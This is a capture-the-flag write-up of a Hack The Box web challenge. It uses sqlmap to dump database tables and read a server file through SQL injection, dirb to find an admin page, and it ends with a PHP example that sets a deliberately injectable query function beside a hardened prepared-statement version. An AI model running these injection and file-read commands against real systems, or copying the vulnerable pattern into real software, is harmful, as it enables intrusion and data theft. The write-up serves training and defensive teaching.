HTB WEB freelancer

Mohamed Ayad
Nov 18, 2019


In the page source we found a link to portfolio.php?id=3.

The id parameter goes into a database query, so let's test it for SQL injection:

sqlmap -u "http://docker.hackthebox.eu:30596/portfolio.php?id=3" --tables

Among the tables we see one called safeadmin, so we dump it:

sqlmap -u "http://docker.hackthebox.eu:30596/portfolio.php?id=3" -T safeadmin --dump

The dumped password hash turns out to be uncrackable, so logging in is not the way forward.

The page source also mentions an /administrat/ directory, so we brute-force PHP files in it:

dirb http://docker.hackthebox.eu:30596/administrat/ -X .php

This finds /administrat/panel.php. That page is injectable too, and since sqlmap can read files through the injection, we pull the panel's own source:

sqlmap -u "http://docker.hackthebox.eu:30596/administrat/panel.php" --file-read=/var/www/html/administrat/panel.php

sqlmap saves the retrieved file locally; cat it and the flag is at the bottom of the file.
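Both steps above work because the same defect is present twice: a request parameter is concatenated into a SQL string, and the database account the application uses has enough privilege for LOAD_FILE() to work. As an added example (not the challenge's source and not part of this write-up), here is a constructed portfolio.php showing the injectable pattern next to a hardened replacement. The table and column names, the PDO connection details and the `app_ro` account are assumptions; the point is that an integer check plus a bound parameter removes the injection, and a database user without the MySQL FILE privilege removes the file-read even if an injection slipped through elsewhere.

```php
<?php
// Added example, not the challenge code. The connection uses an assumed
// low-privilege account: SELECT on the application tables only, no FILE
// privilege, so LOAD_FILE()-based reads fail even when a query is injectable.
$pdo = new PDO('mysql:host=localhost;dbname=portfolio', 'app_ro', 'changeme', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

// Vulnerable pattern: the raw id is spliced into the SQL text, so anything the
// client appends to ?id= is parsed as SQL. This is what sqlmap exploits above.
function getPortfolioVulnerable(PDO $pdo, string $id): array
{
    $sql = "SELECT title, body FROM portfolio WHERE id = " . $id;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: reject anything that is not a positive integer, then bind
// the value as a parameter so the database never treats it as query text.
function getPortfolioSafe(PDO $pdo, string $rawId): array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400); // malformed id: refuse instead of guessing
        return [];
    }
    $stmt = $pdo->prepare('SELECT title, body FROM portfolio WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Only the hardened function is wired up; the vulnerable one is kept for contrast.
foreach (getPortfolioSafe($pdo, $_GET['id'] ?? '') as $row) {
    // Output encoding, so stored content cannot become script in the page.
    echo '<h2>' . htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') . '</h2>';
    echo '<p>' . htmlspecialchars($row['body'], ENT_QUOTES, 'UTF-8') . '</p>';
}
```

With `ATTR_EMULATE_PREPARES` off, PDO sends the statement and the value separately, so the parameter cannot change the query structure regardless of its content. The same treatment applies to whatever parameter panel.php accepts; the privilege reduction is what turns a remaining injection from "read any file the web server can" into "read rows from one table".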
